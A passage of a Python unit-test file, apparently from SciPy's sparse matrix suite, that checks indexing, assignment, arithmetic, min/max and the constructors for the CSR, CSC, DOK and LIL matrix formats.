assert_raises((IndexError, ValueError, TypeError), A.__setitem__, "foo", 2)
assert_raises((IndexError, ValueError, TypeError), A.__setitem__, (2, "foo"), 5)
def test_fancy_indexing_set(self):
n, m = (5, 10)
def _test_set_slice(i, j):
A = self.spmatrix((n, m))
with check_remains_sorted(A):
A[i, j] = 1
B = asmatrix(np.zeros((n, m)))
B[i, j] = 1
assert_array_almost_equal(A.todense(), B)
# [1:2,1:2]
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=SparseEfficiencyWarning)
for i, j in [((2, 3, 4), slice(None, 10, 4)),
(np.arange(3), slice(5, -2)),
(slice(2, 5), slice(5, -2))]:
_test_set_slice(i, j)
for i, j in [(np.arange(3), np.arange(3)), ((0, 3, 4), (1, 2, 4))]:
_test_set_slice(i, j)
def test_fancy_assignment_dtypes(self):
def check(dtype):
A = self.spmatrix((5, 5), dtype=dtype)
A[[0,1],[0,1]] = dtype.type(1)
assert_equal(A.sum(), dtype.type(1)*2)
A[0:2,0:2] = dtype.type(1.0)
assert_equal(A.sum(), dtype.type(1)*4)
A[2,2] = dtype.type(1.0)
assert_equal(A.sum(), dtype.type(1)*4 + dtype.type(1))
for dtype in supported_dtypes:
yield check, np.dtype(dtype)
def test_sequence_assignment(self):
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=SparseEfficiencyWarning)
A = self.spmatrix((4,3))
B = self.spmatrix(eye(3,4))
i0 = [0,1,2]
i1 = (0,1,2)
i2 = array(i0)
with check_remains_sorted(A):
A[0,i0] = B[i0,0].T
A[1,i1] = B[i1,1].T
A[2,i2] = B[i2,2].T
assert_array_equal(A.todense(),B.T.todense())
# column slice
A = self.spmatrix((2,3))
with check_remains_sorted(A):
A[1,1:3] = [10,20]
assert_array_equal(A.todense(), [[0,0,0],[0,10,20]])
# row slice
A = self.spmatrix((3,2))
with check_remains_sorted(A):
A[1:3,1] = [[10],[20]]
assert_array_equal(A.todense(), [[0,0],[0,10],[0,20]])
# both slices
A = self.spmatrix((3,3))
B = asmatrix(np.zeros((3,3)))
with check_remains_sorted(A):
for C in [A, B]:
C[[0,1,2], [0,1,2]] = [4,5,6]
assert_array_equal(A.toarray(), B)
# both slices (2)
A = self.spmatrix((4, 3))
with check_remains_sorted(A):
A[(1, 2, 3), (0, 1, 2)] = [1, 2, 3]
assert_almost_equal(A.sum(), 6)
B = asmatrix(np.zeros((4, 3)))
B[(1, 2, 3), (0, 1, 2)] = [1, 2, 3]
assert_array_equal(A.todense(), B)
def test_fancy_assign_empty(self):
B = asmatrix(arange(50).reshape(5,10))
B[1,:] = 0
B[:,2] = 0
B[3,6] = 0
A = self.spmatrix(B)
K = np.array([False, False, False, False, False])
A[K] = 42
assert_equal(todense(A), B)
K = np.array([], dtype=int)
A[K] = 42
assert_equal(todense(A), B)
A[K,K] = 42
assert_equal(todense(A), B)
J = np.array([0, 1, 2, 3, 4], dtype=int)[:,None]
A[K,J] = 42
assert_equal(todense(A), B)
A[J,K] = 42
assert_equal(todense(A), B)
class _TestFancyMultidim:
def test_fancy_indexing_ndarray(self):
sets = [
(np.array([[1], [2], [3]]), np.array([3, 4, 2])),
(np.array([[1], [2], [3]]), np.array([[3, 4, 2]])),
(np.array([[1, 2, 3]]), np.array([[3], [4], [2]])),
(np.array([1, 2, 3]), np.array([[3], [4], [2]])),
(np.array([[1, 2, 3], [3, 4, 2]]),
np.array([[5, 6, 3], [2, 3, 1]]))
]
# These inputs generate 3-D outputs
# (np.array([[[1], [2], [3]], [[3], [4], [2]]]),
# np.array([[[5], [6], [3]], [[2], [3], [1]]])),
for I, J in sets:
np.random.seed(1234)
D = np.asmatrix(np.random.rand(5, 7))
S = self.spmatrix(D)
SIJ = S[I,J]
if isspmatrix(SIJ):
SIJ = SIJ.todense()
assert_equal(SIJ, D[I,J])
I_bad = I + 5
J_bad = J + 7
assert_raises(IndexError, S.__getitem__, (I_bad,J))
assert_raises(IndexError, S.__getitem__, (I,J_bad))
# This would generate 3-D arrays -- not supported
assert_raises(IndexError, S.__getitem__, ([I, I], slice(None)))
assert_raises(IndexError, S.__getitem__, (slice(None), [J, J]))
class _TestFancyMultidimAssign:
def test_fancy_assign_ndarray(self):
np.random.seed(1234)
D = np.asmatrix(np.random.rand(5, 7))
S = self.spmatrix(D)
X = np.random.rand(2, 3)
I = np.array([[1, 2, 3], [3, 4, 2]])
J = np.array([[5, 6, 3], [2, 3, 1]])
with check_remains_sorted(S):
S[I,J] = X
D[I,J] = X
assert_equal(S.todense(), D)
I_bad = I + 5
J_bad = J + 7
C = [1, 2, 3]
with check_remains_sorted(S):
S[I,J] = C
D[I,J] = C
assert_equal(S.todense(), D)
with check_remains_sorted(S):
S[I,J] = 3
D[I,J] = 3
assert_equal(S.todense(), D)
assert_raises(IndexError, S.__setitem__, (I_bad,J), C)
assert_raises(IndexError, S.__setitem__, (I,J_bad), C)
def test_fancy_indexing_multidim_set(self):
n, m = (5, 10)
def _test_set_slice(i, j):
A = self.spmatrix((n, m))
with check_remains_sorted(A):
A[i, j] = 1
B = asmatrix(np.zeros((n, m)))
B[i, j] = 1
assert_array_almost_equal(A.todense(), B)
# [[[1, 2], [1, 2]], [1, 2]]
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=SparseEfficiencyWarning)
for i, j in [(np.array([[1, 2], [1, 3]]), [1, 3]),
(np.array([0, 4]), [[0, 3], [1, 2]]),
([[1, 2, 3], [0, 2, 4]], [[0, 4, 3], [4, 1, 2]])]:
_test_set_slice(i, j)
def test_fancy_assign_list(self):
np.random.seed(1234)
D = np.asmatrix(np.random.rand(5, 7))
S = self.spmatrix(D)
X = np.random.rand(2, 3)
I = [[1, 2, 3], [3, 4, 2]]
J = [[5, 6, 3], [2, 3, 1]]
S[I,J] = X
D[I,J] = X
assert_equal(S.todense(), D)
I_bad = [[ii + 5 for ii in i] for i in I]
J_bad = [[jj + 7 for jj in j] for j in J]
C = [1, 2, 3]
S[I,J] = C
D[I,J] = C
assert_equal(S.todense(), D)
S[I,J] = 3
D[I,J] = 3
assert_equal(S.todense(), D)
assert_raises(IndexError, S.__setitem__, (I_bad,J), C)
assert_raises(IndexError, S.__setitem__, (I,J_bad), C)
def test_fancy_assign_slice(self):
np.random.seed(1234)
D = np.asmatrix(np.random.rand(5, 7))
S = self.spmatrix(D)
I = [[1, 2, 3], [3, 4, 2]]
J = [[5, 6, 3], [2, 3, 1]]
I_bad = [[ii + 5 for ii in i] for i in I]
J_bad = [[jj + 7 for jj in j] for j in J]
C = [1, 2, 3, 4, 5, 6, 7]
assert_raises(IndexError, S.__setitem__, (I_bad, slice(None)), C)
assert_raises(IndexError, S.__setitem__, (slice(None), J_bad), C)
class _TestArithmetic:
"""
Test real/complex arithmetic
"""
def __arith_init(self):
# these can be represented exactly in FP (so arithmetic should be exact)
self.__A = matrix([[-1.5, 6.5, 0, 2.25, 0, 0],
[3.125, -7.875, 0.625, 0, 0, 0],
[0, 0, -0.125, 1.0, 0, 0],
[0, 0, 8.375, 0, 0, 0]],'float64')
self.__B = matrix([[0.375, 0, 0, 0, -5, 2.5],
[14.25, -3.75, 0, 0, -0.125, 0],
[0, 7.25, 0, 0, 0, 0],
[18.5, -0.0625, 0, 0, 0, 0]],'complex128')
self.__B.imag = matrix([[1.25, 0, 0, 0, 6, -3.875],
[2.25, 4.125, 0, 0, 0, 2.75],
[0, 4.125, 0, 0, 0, 0],
[-0.0625, 0, 0, 0, 0, 0]],'float64')
# fractions are all x/16ths
assert_array_equal((self.__A*16).astype('int32'),16*self.__A)
assert_array_equal((self.__B.real*16).astype('int32'),16*self.__B.real)
assert_array_equal((self.__B.imag*16).astype('int32'),16*self.__B.imag)
self.__Asp = self.spmatrix(self.__A)
self.__Bsp = self.spmatrix(self.__B)
def test_add_sub(self):
self.__arith_init()
# basic tests
assert_array_equal((self.__Asp+self.__Bsp).todense(),self.__A+self.__B)
# check conversions
for x in supported_dtypes:
A = self.__A.astype(x)
Asp = self.spmatrix(A)
for y in supported_dtypes:
if not np.issubdtype(y, np.complexfloating):
B = self.__B.real.astype(y)
else:
B = self.__B.astype(y)
Bsp = self.spmatrix(B)
# addition
D1 = A + B
S1 = Asp + Bsp
assert_equal(S1.dtype,D1.dtype)
assert_array_equal(S1.todense(),D1)
assert_array_equal(Asp + B,D1) # check sparse + dense
assert_array_equal(A + Bsp,D1) # check dense + sparse
# subtraction
if (np.dtype('bool') in [x, y]) and (
NumpyVersion(np.__version__) >= '1.9.0.dev'):
# boolean array subtraction deprecated in 1.9.0
continue
D1 = A - B
S1 = Asp - Bsp
assert_equal(S1.dtype,D1.dtype)
assert_array_equal(S1.todense(),D1)
assert_array_equal(Asp - B,D1) # check sparse - dense
assert_array_equal(A - Bsp,D1) # check dense - sparse
def test_mu(self):
self.__arith_init()
# basic tests
assert_array_equal((self.__Asp*self.__Bsp.T).todense(),self.__A*self.__B.T)
for x in supported_dtypes:
A = self.__A.astype(x)
Asp = self.spmatrix(A)
for y in supported_dtypes:
if np.issubdtype(y, np.complexfloating):
B = self.__B.astype(y)
else:
B = self.__B.real.astype(y)
Bsp = self.spmatrix(B)
D1 = A * B.T
S1 = Asp * Bsp.T
assert_allclose(S1.todense(), D1,
atol=1e-14*abs(D1).max())
assert_equal(S1.dtype,D1.dtype)
class _TestMinMax(object):
def test_minmax(self):
for dtype in [np.float32, np.float64, np.int32, np.int64, np.complex128]:
D = np.arange(20, dtype=dtype).reshape(5,4)
X = self.spmatrix(D)
assert_equal(X.min(), 0)
assert_equal(X.max(), 19)
assert_equal(X.min().dtype, dtype)
assert_equal(X.max().dtype, dtype)
D *= -1
X = self.spmatrix(D)
assert_equal(X.min(), -19)
assert_equal(X.max(), 0)
D += 5
X = self.spmatrix(D)
assert_equal(X.min(), -14)
assert_equal(X.max(), 5)
# try a fully dense matrix
X = self.spmatrix(np.arange(1, 10).reshape(3, 3))
assert_equal(X.min(), 1)
assert_equal(X.min().dtype, X.dtype)
X = -X
assert_equal(X.max(), -1)
# and a fully sparse matrix
Z = self.spmatrix(np.zeros(1))
assert_equal(Z.min(), 0)
assert_equal(Z.max(), 0)
assert_equal(Z.max().dtype, Z.dtype)
# another test
D = np.arange(20, dtype=float).reshape(5,4)
D[0:2, :] = 0
X = self.spmatrix(D)
assert_equal(X.min(), 0)
assert_equal(X.max(), 19)
# zero-size matrices
for D in [np.zeros((0, 0)), np.zeros((0, 10)), np.zeros((10, 0))]:
X = self.spmatrix(D)
assert_raises(ValueError, X.min)
assert_raises(ValueError, X.max)
def test_minmax_axis(self):
D = np.matrix(np.arange(50).reshape(5,10))
# completely empty rows, leaving some completely full:
D[1, :] = 0
# empty at end for reduceat:
D[:, 9] = 0
# partial rows/cols:
D[3, 3] = 0
# entries on either side of 0:
D[2, 2] = -1
X = self.spmatrix(D)
if NumpyVersion(np.__version__) >= '1.7.0':
# np.matrix.sum with negative axis arg doesn't work for < 1.7
axes = [-2, -1, 0, 1]
else:
axes = [0, 1]
for axis in axes:
assert_array_equal(X.max(axis=axis).A, D.max(axis=axis).A)
assert_array_equal(X.min(axis=axis).A, D.min(axis=axis).A)
# full matrix
D = np.matrix(np.arange(1, 51).reshape(10, 5))
X = self.spmatrix(D)
for axis in axes:
assert_array_equal(X.max(axis=axis).A, D.max(axis=axis).A)
assert_array_equal(X.min(axis=axis).A, D.min(axis=axis).A)
# empty matrix
D = np.matrix(np.zeros((10, 5)))
X = self.spmatrix(D)
for axis in axes:
assert_array_equal(X.max(axis=axis).A, D.max(axis=axis).A)
assert_array_equal(X.min(axis=axis).A, D.min(axis=axis).A)
if NumpyVersion(np.__version__) >= '1.7.0':
axes_even = [0, -2]
axes_odd = [1, -1]
else:
axes_even = [0]
axes_odd = [1]
# zero-size matrices
D = np.zeros((0, 10))
X = self.spmatrix(D)
for axis in axes_even:
assert_raises(ValueError, X.min, axis=axis)
assert_raises(ValueError, X.max, axis=axis)
for axis in axes_odd:
assert_array_equal(np.zeros((0, 1)), X.min(axis=axis).A)
assert_array_equal(np.zeros((0, 1)), X.max(axis=axis).A)
D = np.zeros((10, 0))
X = self.spmatrix(D)
for axis in axes_odd:
assert_raises(ValueError, X.min, axis=axis)
assert_raises(ValueError, X.max, axis=axis)
for axis in axes_even:
assert_array_equal(np.zeros((1, 0)), X.min(axis=axis).A)
assert_array_equal(np.zeros((1, 0)), X.max(axis=axis).A)
class _TestGetNnzAxis(object):
def test_getnnz_axis(self):
dat = np.matrix([[0, 2],
[3, 5],
[-6, 9]])
bool_dat = dat.astype(bool).A
datsp = self.spmatrix(dat)
assert_array_equal(bool_dat.sum(axis=None), datsp.getnnz(axis=None))
assert_array_equal(bool_dat.sum(), datsp.getnnz())
assert_array_equal(bool_dat.sum(axis=0), datsp.getnnz(axis=0))
assert_array_equal(bool_dat.sum(axis=1), datsp.getnnz(axis=1))
if NumpyVersion(np.__version__) >= '1.7.0':
# np.matrix.sum with negative axis arg doesn't work for < 1.7
assert_array_equal(bool_dat.sum(axis=-2), datsp.getnnz(axis=-2))
assert_array_equal(bool_dat.sum(axis=-1), datsp.getnnz(axis=-1))
assert_raises(ValueError, datsp.getnnz, axis=2)
#------------------------------------------------------------------------------
# Tailored base class for generic tests
#------------------------------------------------------------------------------
def _possibly_unimplemented(cls, require=True):
"""
Construct a class that either runs tests as usual (require=True),
or each method raises SkipTest if it encounters a common error.
"""
if require:
return cls
else:
def wrap(fc):
def wrapper(*a, **kw):
try:
return fc(*a, **kw)
except (NotImplementedError, TypeError, ValueError,
IndexError, AttributeError):
raise nose.SkipTest("feature not implemented")
wrapper.__name__ = fc.__name__
return wrapper
new_dict = dict(cls.__dict__)
for name, func in cls.__dict__.items():
if name.startswith('test_'):
new_dict[name] = wrap(func)
return type(cls.__name__ + "NotImplemented",
cls.__bases__,
new_dict)
def sparse_test_class(getset=True, slicing=True, slicing_assign=True,
fancy_indexing=True, fancy_assign=True,
fancy_multidim_indexing=True, fancy_multidim_assign=True,
minmax=True, nnz_axis=True):
"""
Construct a base class, optionally converting some of the tests in
the suite to check that the feature is not implemented.
"""
bases = (_TestCommon,
_possibly_unimplemented(_TestGetSet, getset),
_TestSolve,
_TestInplaceArithmetic,
_TestArithmetic,
_possibly_unimplemented(_TestSlicing, slicing),
_possibly_unimplemented(_TestSlicingAssign, slicing_assign),
_possibly_unimplemented(_TestFancyIndexing, fancy_indexing),
_possibly_unimplemented(_TestFancyIndexingAssign,
fancy_assign),
_possibly_unimplemented(_TestFancyMultidim,
fancy_indexing and fancy_multidim_indexing),
_possibly_unimplemented(_TestFancyMultidimAssign,
fancy_multidim_assign and fancy_assign),
_possibly_unimplemented(_TestMinMax, minmax),
_possibly_unimplemented(_TestGetNnzAxis, nnz_axis))
# check that test names do not clash
names = {}
for cls in bases:
for name in cls.__dict__:
if not name.startswith('test_'):
continue
old_cls = names.get(name)
if old_cls is not None:
raise ValueError("Test class %s overloads test %s defined in %s" % (
cls.__name__, name, old_cls.__name__))
names[name] = cls
return type("TestBase", bases, {})
#------------------------------------------------------------------------------
# Matrix class based tests
#------------------------------------------------------------------------------
class TestCSR(sparse_test_class()):
spmatrix = csr_matrix
checked_dtypes = [np.bool_, np.int_, np.float_, np.complex_]
def test_constructor1(self):
b = matrix([[0,4,0],
[3,0,0],
[0,2,0]],'d')
bsp = csr_matrix(b)
assert_array_almost_equal(bsp.data,[4,3,2])
assert_array_equal(bsp.indices,[1,0,1])
assert_array_equal(bsp.indptr,[0,1,2,3])
assert_equal(bsp.getnnz(),3)
assert_equal(bsp.getformat(),'csr')
assert_array_equal(bsp.todense(),b)
def test_constructor2(self):
b = zeros((6,6),'d')
b[3,4] = 5
bsp = csr_matrix(b)
assert_array_almost_equal(bsp.data,[5])
assert_array_equal(bsp.indices,[4])
assert_array_equal(bsp.indptr,[0,0,0,0,1,1,1])
assert_array_almost_equal(bsp.todense(),b)
def test_constructor3(self):
b = matrix([[1,0],
[0,2],
[3,0]],'d')
bsp = csr_matrix(b)
assert_array_almost_equal(bsp.data,[1,2,3])
assert_array_equal(bsp.indices,[0,1,0])
assert_array_equal(bsp.indptr,[0,1,2,3])
assert_array_almost_equal(bsp.todense(),b)
### currently disabled
## def test_constructor4(self):
## """try using int64 indices"""
## data = arange( 6 ) + 1
## col = array( [1, 2, 1, 0, 0, 2], dtype='int64' )
## ptr = array( [0, 2, 4, 6], dtype='int64' )
##
## a = csr_matrix( (data, col, ptr), shape = (3,3) )
##
## b = matrix([[0,1,2],
## [4,3,0],
## [5,0,6]],'d')
##
## assert_equal(a.indptr.dtype,numpy.dtype('int64'))
## assert_equal(a.indices.dtype,numpy.dtype('int64'))
## assert_array_equal(a.todense(),b)
def test_constructor4(self):
# using (data, ij) format
row = array([2, 3, 1, 3, 0, 1, 3, 0, 2, 1, 2])
col = array([0, 1, 0, 0, 1, 1, 2, 2, 2, 2, 1])
data = array([6., 10., 3., 9., 1., 4.,
11., 2., 8., 5., 7.])
ij = vstack((row,col))
csr = csr_matrix((data,ij),(4,3))
assert_array_equal(arange(12).reshape(4,3),csr.todense())
def test_constructor5(self):
# infer dimensions from arrays
indptr = array([0,1,3,3])
indices = array([0,5,1,2])
data = array([1,2,3,4])
csr = csr_matrix((data, indices, indptr))
assert_array_equal(csr.shape,(3,6))
def test_sort_indices(self):
data = arange(5)
indices = array([7, 2, 1, 5, 4])
indptr = array([0, 3, 5])
asp = csr_matrix((data, indices, indptr), shape=(2,10))
bsp = asp.copy()
asp.sort_indices()
assert_array_equal(asp.indices,[1, 2, 7, 4, 5])
assert_array_equal(asp.todense(),bsp.todense())
def test_eliminate_zeros(self):
data = array([1, 0, 0, 0, 2, 0, 3, 0])
indices = array([1, 2, 3, 4, 5, 6, 7, 8])
indptr = array([0, 3, 8])
asp = csr_matrix((data, indices, indptr), shape=(2,10))
bsp = asp.copy()
asp.eliminate_zeros()
assert_array_equal(asp.nnz, 3)
assert_array_equal(asp.data,[1, 2, 3])
assert_array_equal(asp.todense(),bsp.todense())
def test_ufuncs(self):
X = csr_matrix(np.arange(20).reshape(4, 5) / 20.)
for f in ["sin", "tan", "arcsin", "arctan", "sinh", "tanh",
"arcsinh", "arctanh", "rint", "sign", "expm1", "log1p",
"deg2rad", "rad2deg", "floor", "ceil", "trunc", "sqrt"]:
assert_equal(hasattr(csr_matrix, f), True)
X2 = getattr(X, f)()
assert_equal(X.shape, X2.shape)
assert_array_equal(X.indices, X2.indices)
assert_array_equal(X.indptr, X2.indptr)
assert_array_equal(X2.toarray(), getattr(np, f)(X.toarray()))
def test_unsorted_arithmetic(self):
data = arange(5)
indices = array([7, 2, 1, 5, 4])
indptr = array([0, 3, 5])
asp = csr_matrix((data, indices, indptr), shape=(2,10))
data = arange(6)
indices = array([8, 1, 5, 7, 2, 4])
indptr = array([0, 2, 6])
bsp = csr_matrix((data, indices, indptr), shape=(2,10))
assert_equal((asp + bsp).todense(), asp.todense() + bsp.todense())
def test_fancy_indexing_broadcast(self):
# broadcasting indexing mode is supported
I = np.array([[1], [2], [3]])
J = np.array([3, 4, 2])
np.random.seed(1234)
D = np.asmatrix(np.random.rand(5, 7))
S = self.spmatrix(D)
SIJ = S[I,J]
if isspmatrix(SIJ):
SIJ = SIJ.todense()
assert_equal(SIJ, D[I,J])
def test_has_sorted_indices(self):
"Ensure has_sorted_indices memoizes sorted state for sort_indices"
sorted_inds = np.array([0, 1])
unsorted_inds = np.array([1, 0])
data = np.array([1, 1])
indptr = np.array([0, 2])
M = csr_matrix((data, sorted_inds, indptr)).copy()
assert_equal(True, M.has_sorted_indices)
M = csr_matrix((data, unsorted_inds, indptr)).copy()
assert_equal(False, M.has_sorted_indices)
# set by sorting
M.sort_indices()
assert_equal(True, M.has_sorted_indices)
assert_array_equal(M.indices, sorted_inds)
M = csr_matrix((data, unsorted_inds, indptr)).copy()
# set manually (although underlyingly unsorted)
M.has_sorted_indices = True
assert_equal(True, M.has_sorted_indices)
assert_array_equal(M.indices, unsorted_inds)
# ensure sort bypassed when has_sorted_indices == True
M.sort_indices()
assert_array_equal(M.indices, unsorted_inds)
def test_has_canonical_format(self):
"Ensure has_canonical_format memoizes state for sum_duplicates"
M = csr_matrix((np.array([2]), np.array([0]), np.array([0, 1])))
assert_equal(True, M.has_canonical_format)
indices = np.array([0, 0]) # contains duplicate
data = np.array([1, 1])
indptr = np.array([0, 2])
M = csr_matrix((data, indices, indptr)).copy()
assert_equal(False, M.has_canonical_format)
# set by deduplicating
M.sum_duplicates()
assert_equal(True, M.has_canonical_format)
assert_equal(1, len(M.indices))
M = csr_matrix((data, indices, indptr)).copy()
# set manually (although underlyingly duplicated)
M.has_canonical_format = True
assert_equal(True, M.has_canonical_format)
assert_equal(2, len(M.indices)) # unaffected content
# ensure deduplication bypassed when has_canonical_format == True
M.sum_duplicates()
assert_equal(2, len(M.indices)) # unaffected content
class TestCSC(sparse_test_class()):
spmatrix = csc_matrix
checked_dtypes = [np.bool_, np.int_, np.float_, np.complex_]
def test_constructor1(self):
b = matrix([[1,0,0,0],[0,0,1,0],[0,2,0,3]],'d')
bsp = csc_matrix(b)
assert_array_almost_equal(bsp.data,[1,2,1,3])
assert_array_equal(bsp.indices,[0,2,1,2])
assert_array_equal(bsp.indptr,[0,1,2,3,4])
assert_equal(bsp.getnnz(),4)
assert_equal(bsp.shape,b.shape)
assert_equal(bsp.getformat(),'csc')
def test_constructor2(self):
b = zeros((6,6),'d')
b[2,4] = 5
bsp = csc_matrix(b)
assert_array_almost_equal(bsp.data,[5])
assert_array_equal(bsp.indices,[2])
assert_array_equal(bsp.indptr,[0,0,0,0,0,1,1])
def test_constructor3(self):
b = matrix([[1,0],[0,0],[0,2]],'d')
bsp = csc_matrix(b)
assert_array_almost_equal(bsp.data,[1,2])
assert_array_equal(bsp.indices,[0,2])
assert_array_equal(bsp.indptr,[0,1,2])
def test_constructor4(self):
# using (data, ij) format
row = array([2, 3, 1, 3, 0, 1, 3, 0, 2, 1, 2])
col = array([0, 1, 0, 0, 1, 1, 2, 2, 2, 2, 1])
data = array([6., 10., 3., 9., 1., 4.,
11., 2., 8., 5., 7.])
ij = vstack((row,col))
csc = csc_matrix((data,ij),(4,3))
assert_array_equal(arange(12).reshape(4,3),csc.todense())
def test_constructor5(self):
# infer dimensions from arrays
indptr = array([0,1,3,3])
indices = array([0,5,1,2])
data = array([1,2,3,4])
csc = csc_matrix((data, indices, indptr))
assert_array_equal(csc.shape,(6,3))
def test_eliminate_zeros(self):
data = array([1, 0, 0, 0, 2, 0, 3, 0])
indices = array([1, 2, 3, 4, 5, 6, 7, 8])
indptr = array([0, 3, 8])
asp = csc_matrix((data, indices, indptr), shape=(10,2))
bsp = asp.copy()
asp.eliminate_zeros()
assert_array_equal(asp.nnz, 3)
assert_array_equal(asp.data,[1, 2, 3])
assert_array_equal(asp.todense(),bsp.todense())
def test_sort_indices(self):
data = arange(5)
row = array([7, 2, 1, 5, 4])
ptr = [0, 3, 5]
asp = csc_matrix((data, row, ptr), shape=(10,2))
bsp = asp.copy()
asp.sort_indices()
assert_array_equal(asp.indices,[1, 2, 7, 4, 5])
assert_array_equal(asp.todense(),bsp.todense())
def test_ufuncs(self):
X = csc_matrix(np.arange(21).reshape(7, 3) / 21.)
for f in ["sin", "tan", "arcsin", "arctan", "sinh", "tanh",
"arcsinh", "arctanh", "rint", "sign", "expm1", "log1p",
"deg2rad", "rad2deg", "floor", "ceil", "trunc", "sqrt"]:
assert_equal(hasattr(csr_matrix, f), True)
X2 = getattr(X, f)()
assert_equal(X.shape, X2.shape)
assert_array_equal(X.indices, X2.indices)
assert_array_equal(X.indptr, X2.indptr)
assert_array_equal(X2.toarray(), getattr(np, f)(X.toarray()))
def test_unsorted_arithmetic(self):
data = arange(5)
indices = array([7, 2, 1, 5, 4])
indptr = array([0, 3, 5])
asp = csc_matrix((data, indices, indptr), shape=(10,2))
data = arange(6)
indices = array([8, 1, 5, 7, 2, 4])
indptr = array([0, 2, 6])
bsp = csc_matrix((data, indices, indptr), shape=(10,2))
assert_equal((asp + bsp).todense(), asp.todense() + bsp.todense())
def test_fancy_indexing_broadcast(self):
# broadcasting indexing mode is supported
I = np.array([[1], [2], [3]])
J = np.array([3, 4, 2])
np.random.seed(1234)
D = np.asmatrix(np.random.rand(5, 7))
S = self.spmatrix(D)
SIJ = S[I,J]
if isspmatrix(SIJ):
SIJ = SIJ.todense()
assert_equal(SIJ, D[I,J])
class TestDOK(sparse_test_class(minmax=False, nnz_axis=False)):
spmatrix = dok_matrix
checked_dtypes = [np.int_, np.float_, np.complex_]
def test_mult(self):
A = dok_matrix((10,10))
A[0,3] = 10
A[5,6] = 20
D = A*A.T
E = A*A.H
assert_array_equal(D.A, E.A)
def test_add_nonzero(self):
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=SparseEfficiencyWarning)
A = self.spmatrix((3,2))
A[0,1] = -10
A[2,0] = 20
A = A + 10
B = matrix([[10, 0], [10, 10], [30, 10]])
assert_array_equal(A.todense(), B)
A = A + 1j
B = B + 1j
assert_array_equal(A.todense(), B)
def test_dok_divide_scalar(self):
A = self.spmatrix((3,2))
A[0,1] = -10
A[2,0] = 20
assert_array_equal((A/1j).todense(), A.todense()/1j)
assert_array_equal((A/9).todense(), A.todense()/9)
def test_convert(self):
# Test provided by Andrew Straw. Fails in SciPy <= r1477.
(m, n) = (6, 7)
a = dok_matrix((m, n))
# set a few elements, but none in the last column
a[2,1] = 1
a[0,2] = 2
a[3,1] = 3
a[1,5] = 4
a[4,3] = 5
a[4,2] = 6
# assert that the last column is all zeros
assert_array_equal(a.toarray()[:,n-1], zeros(m,))
# make sure it still works for CSC format
csc = a.tocsc()
assert_array_equal(csc.toarray()[:,n-1], zeros(m,))
# now test CSR
(m, n) = (n, m)
b = a.transpose()
assert_equal(b.shape, (m, n))
# assert that the last row is all zeros
assert_array_equal(b.toarray()[m-1,:], zeros(n,))
# make sure it still works for CSR format
csr = b.tocsr()
assert_array_equal(csr.toarray()[m-1,:], zeros(n,))
def test_ctor(self):
# Empty ctor
assert_raises(TypeError, dok_matrix)
# Dense ctor
b = matrix([[1,0,0,0],[0,0,1,0],[0,2,0,3]],'d')
A = dok_matrix(b)
assert_equal(b.dtype, A.dtype)
assert_equal(A.todense(), b)
# Sparse ctor
c = csr_matrix(b)
assert_equal(A.todense(), c.todense())
data = [[0, 1, 2], [3, 0, 0]]
d = dok_matrix(data, dtype=np.float32)
assert_equal(d.dtype, np.float32)
da = d.toarray()
assert_equal(da.dtype, np.float32)
assert_array_equal(da, data)
def test_resize(self):
# A couple basic tests of the resize() method.
#
# resize(shape) resizes the array in-place.
a = dok_matrix((5,5))
a[:,0] = 1
a.resize((2,2))
expected1 = array([[1,0],[1,0]])
assert_array_equal(a.todense(), expected1)
a.resize((3,2))
expected2 = array([[1,0],[1,0],[0,0]])
assert_array_equal(a.todense(), expected2)
def test_ticket1160(self):
# Regression test for ticket #1160.
a = dok_matrix((3,3))
a[0,0] = 0
# This assert would fail, because the above assignment would
# incorrectly call __set_item__ even though the value was 0.
assert_((0,0) not in a.keys(), "Unexpected entry (0,0) in keys")
# Slice assignments were also affected.
b = dok_matrix((3,3))
b[:,0] = 0
assert_(len(b.keys()) == 0, "Unexpected entries in keys")
##
## TODO: The DOK matrix currently returns invalid results rather
## than raising errors in some indexing operations
##
@dec.knownfailureif(True, "known deficiency in DOK")
def test_fancy_indexing(self):
pass
@dec.knownfailureif(True, "known deficiency in DOK")
def test_add_sub(self):
pass
class TestLIL(sparse_test_class(minmax=False)):
spmatrix = lil_matrix
checked_dtypes = [np.int_, np.float_, np.complex_]
def test_dot(self):
A = matrix(zeros((10,10)))
A[0,3] = 10
A[5,6] = 20
B = lil_matrix((10,10))
B[0,3] = 10
B[5,6] = 20
assert_array_equal(A * A.T, (B * B.T).todense())
assert_array_equal(A * A.H, (B * B.H).todense())
def test_scalar_mul(self):
x = lil_matrix((3,3))
x[0,0] = 2
x = x*2
assert_equal(x[0,0],4)
x = x*0
assert_equal(x[0,0],0)
def test_reshape(self):
x = lil_matrix((4,3))
x[0,0] = 1
x[2,1] = 3
x[3,2] = 5
x[0,2] = 7
for s in [(12,1),(1,12)]:
assert_array_equal(x.reshape(s).todense(),
x.todense().reshape(s))
def test_inplace_ops(self):
A = lil_matrix([[0,2,3],[4,0,6]])
B = lil_matrix([[0,1,0],[0,2,3]])
data = {'add': (B,A + B),
'sub': (B,A - B),
'mul': (3,A * 3)}
for op,(other,expected) in data.items():
result = A.copy()
getattr(result, '__i%s__' % op)(other)
assert_array_equal(result.todense(), expected.todense())
# Ticket 1604.
A = lil_matrix((1,3), dtype=np.dtype('float64'))
B = array([0.1,0.1,0.1])
A[0,:] += B
assert_array_equal(A[0,:].toarray().squeeze(), B)
def test_lil_iteration(self):
row_data = [[1,2,3],[4,5,6]]
B = lil_matrix(array(row_data))
for r,row in enumerate(B):
assert_array_equal(row.todense(),array(row_data[r],ndmin=2))
def test_lil_from_csr(self):
# Tests whether a lil_matrix can be constructed from a
# csr_matrix.
B = lil_matrix((10,10))
B[0,3] = 10
B[5,6] = 20
B[8,3] = 30
B[3,8] = 40
B[8,9] = 50
C = B.tocsr()
D = lil_matrix(C)
assert_array_equal(C.A, D.A)
def test_fancy_indexing_lil(self):
M = asmatrix(arange(25).reshape(5,5))
A = lil_matrix(M)
assert_equal(A[array([1,2,3]),2:3].todense(), M[array([1,2,3]),2:3])
def test_point_wise_multiply(self):
l = lil_matrix((4,3))
l[0,0] = 1
l[1,1] = 2
l[2,2] = 3
l[3,1] = 4
m = lil_matrix((4,3))
m[0,0] = 1
m[0,1] = 2
m[2,2] = 3
m[3,1] = 4
m[3,2] = 4
assert_array_equal(l.multiply(m).todense(),
m.multiply(l).todense())
